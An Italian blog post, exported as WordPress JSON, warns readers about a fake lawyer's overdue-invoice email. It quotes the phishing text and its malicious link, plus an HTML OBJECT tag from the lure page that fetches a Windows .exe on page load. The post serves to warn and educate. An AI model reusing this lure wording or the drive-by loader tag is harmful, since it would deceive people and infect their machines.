{"id":5669,"date":"2008-01-21T14:18:48","date_gmt":"2008-01-21T14:18:48","guid":{"rendered":"http:\/\/xmau.com\/wp\/notiziole\/2008\/01\/21\/attenti_alle_fa\/"},"modified":"2008-01-21T14:18:48","modified_gmt":"2008-01-21T14:18:48","slug":"attenti_alle_fa","status":"publish","type":"post","link":"https:\/\/xmau.com\/notiziole\/2008\/01\/21\/attenti_alle_fa\/","title":{"rendered":"Attenti alle fatture"},"content":{"rendered":"

Anna mi ha appena passato un minaccioso messaggio che le era arrivato per email. Il testo \u00e8 il seguente:
\nSubject: Avviso di insoluto su Fattura<\/tt>
\nGentile Cliente,<\/tt>
\nDa un nostro controllo contabile non ci risulta a tutt'oggi il pagamento della fattura P.N. 335624-1 dell'importo di Euro 4.329,50.<\/tt>
\nSe la fattura risulta gia saldata o se ritiene possa sussistere un errore cotabile la invito a prendere visione del conto da pagare attraverso il nostro:<\/tt>
\nwww.avvocati-ass.com\/Fatturazione_CEF\/FTR-335624.html ( clicca per collegarti )<\/tt>
\nIn difetto, provveder\u00f2 ad agire nelle sedi opportune, senza ulteriore preavviso.<\/tt>
\nDistinti saluti.<\/tt>
\nDott.Avv. Giancarlo Gentiloni<\/tt>
\nI miei affezionati lettori avranno immediatamente notato i due errori di grammatica (“gia<\/b> saldata” ed “errore cotabile<\/b>“) e avranno capito che si tratta di un phishing. In effetti, cliccando sul link, esce una pagina dal titolo intimidente ATTO DI DIFFIDA E MESSA IN MORA<\/b> e l’immagine di una pagina rimpicciolita in modo che non possa leggerla. Se avete un PC windows, non provate a cliccare n\u00e9 sulla pagina n\u00e9 sulla scritta “ingrandisci”, visto che verrebbe immediatamente scaricato un file .exe che non voglio affatto sapere cosa faccia.
\nInoltre, guardando il sorgente di quella pagina, c’\u00e8 anche il codice seguente: <OBJECT CLASSID=\"CLSID:F16FEB0E-2A86-4228-AFF1-E7500263A51F\" CODEBASE=\"Fatt56563A.exe\" width=\"1\" height=\"1\"><\/OBJECT><\/tt> che potrebbe dare dei guai anche senza cliccare su quelle immagini, solo aprendo la pagina di cui sopra. Non dite che non vi ho avvertiti!
\nps: se uno va a fare un controllo whois sul nome a dominio avvocati-ass.com, scopre che \u00e8 stato registrato attraverso una societ\u00e0 californiana che nasconde il nome del gestore vero e proprio, e soprattutto scopre che \u00e8 stato registrato sabato pomeriggio scorso: Creation date: 19 Jan 2008 14:27:36<\/tt>. Se poi si vuole divertire, pu\u00f2 andare alla pagina di informazioni<\/a>, dove scopre – ma non c’\u00e8 nulla di strano – che il sito \u00e8 cinese… Il curiosone pu\u00f2 anche andare all’indirizzo IP corrispondente<\/a> e vedere un po’ di ideogrammi che Babelfish mi traduce pi\u00f9 o meno come “il tuo sito non \u00e8 stato ben configurato”. Ma forse quando voi leggerete questa mia notiziola, l’IP sar\u00e0 cambiato: il sito infatti dice che il client pu\u00f2 salvare l’indirizzo per non pi\u00f9 di tre minuti<\/b> (il default \u00e8 da uno a tre giorni :-) )
\nAggiornamento:<\/b> (h 21:50) A quanto pare, questa notiziola mi ha fatto raggiungere nuove vette di contatti, pi\u00f9 che i miei pipponi con Ratzi della scorsa settimana. D’altra parte, in questo momento non solo una ricerca per “avvocati-ass.com” riporta il mio blog al primo posto (fregando altri che ne avevano parlato prima di me…), ma non ci sono occorrenze<\/b> al di fuori del circuito dei blog e dei forum. Quindi nulla dai grandi quotidiani online, ma soprattutto nulla dalle societ\u00e0 che si fanno pagare per le loro “soluzioni di sicurezza”. Magari poi i loro prodotti bloccano il troiano, ma per molta gente loro sono la Fonte di Tranquillit\u00e0, e un avvisino sul loro portale sarebbe stato utile. O no?<\/p>\n","protected":false},"excerpt":{"rendered":"

un nuovo phishing, ma la tecnica \u00e8 ben vecchia…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"activitypub_content_warning":"","activitypub_content_visibility":"","activitypub_max_image_attachments":3,"activitypub_interaction_policy_quote":"anyone","activitypub_status":"","footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2},"jetpack_post_was_ever_published":false},"categories":[319],"tags":[],"class_list":["post-5669","post","type-post","status-publish","format-standard","hentry","category-spam_phishing"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/phh2yV-1tr","jetpack-related-posts":[{"id":17732,"url":"https:\/\/xmau.com\/notiziole\/2018\/11\/23\/fatture-elettroniche\/","url_meta":{"origin":5669,"position":0},"title":"Fatture elettroniche","author":".mau.","date":"2018-11-23","format":false,"excerpt":"Toh, violano la privacy.","rel":"","context":"In "pipponi"","block_context":{"text":"pipponi","link":"https:\/\/xmau.com\/notiziole\/category\/pipponi\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":13960,"url":"https:\/\/xmau.com\/notiziole\/2016\/11\/04\/ransomware-via-pec\/","url_meta":{"origin":5669,"position":1},"title":"Ransomware via PEC?","author":".mau.","date":"2016-11-04","format":false,"excerpt":"purtroppo mi sa che non ci si possa fare pi\u00f9 di tanto","rel":"","context":"In "spam_phishing"","block_context":{"text":"spam_phishing","link":"https:\/\/xmau.com\/notiziole\/category\/spam_phishing\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":7954,"url":"https:\/\/xmau.com\/notiziole\/2010\/07\/01\/con_i_libri_si_\/","url_meta":{"origin":5669,"position":2},"title":"con i libri si guadagna","author":".mau.","date":"2010-07-01","format":false,"excerpt":"Internet Bookshop mi ha avvisato che ho guadagnato ben 53 euro con gli acquisti fatti dai miei lettori sul loro sito, e che quindi posso farmi fare fattura. Il tutto in due anni, e con penso un terzo di questi soldi ottenuti da ordini fatti da me :-)","rel":"","context":"In "io"","block_context":{"text":"io","link":"https:\/\/xmau.com\/notiziole\/category\/io\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":16907,"url":"https:\/\/xmau.com\/notiziole\/2018\/06\/06\/salvini-il-reaganiano\/","url_meta":{"origin":5669,"position":3},"title":"Salvini il reaganiano","author":".mau.","date":"2018-06-06","format":false,"excerpt":"Non \u00e8 che la frase effettivaente pronunciata da Salvini sia poi cos\u00ec intelligente","rel":"","context":"In "politica"","block_context":{"text":"politica","link":"https:\/\/xmau.com\/notiziole\/category\/politica\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":4194,"url":"https:\/\/xmau.com\/notiziole\/2006\/06\/13\/paperless_office\/","url_meta":{"origin":5669,"position":4},"title":"paperless office","author":".mau.","date":"2006-06-13","format":false,"excerpt":"forse stavolta ci siamo davvero?","rel":"","context":"In "y2006_io"","block_context":{"text":"y2006_io","link":"https:\/\/xmau.com\/notiziole\/category\/y2006_io\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":28733,"url":"https:\/\/xmau.com\/notiziole\/2024\/04\/11\/phishing-o-non-phishing\/","url_meta":{"origin":5669,"position":5},"title":"Phishing o non phishing?","author":".mau.","date":"2024-04-11","format":false,"excerpt":"da sdi53@pec.fatturapa.it","rel":"","context":"In "spam_phishing"","block_context":{"text":"spam_phishing","link":"https:\/\/xmau.com\/notiziole\/category\/spam_phishing\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/xmau.com\/notiziole\/wp-content\/uploads\/sites\/6\/2024\/04\/fatturaPA.jpg?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]}],"jetpack_likes_enabled":true,"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/posts\/5669","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/comments?post=5669"}],"version-history":[{"count":0,"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/posts\/5669\/revisions"}],"wp:attachment":[{"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/media?parent=5669"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/categories?post=5669"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/tags?post=5669"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}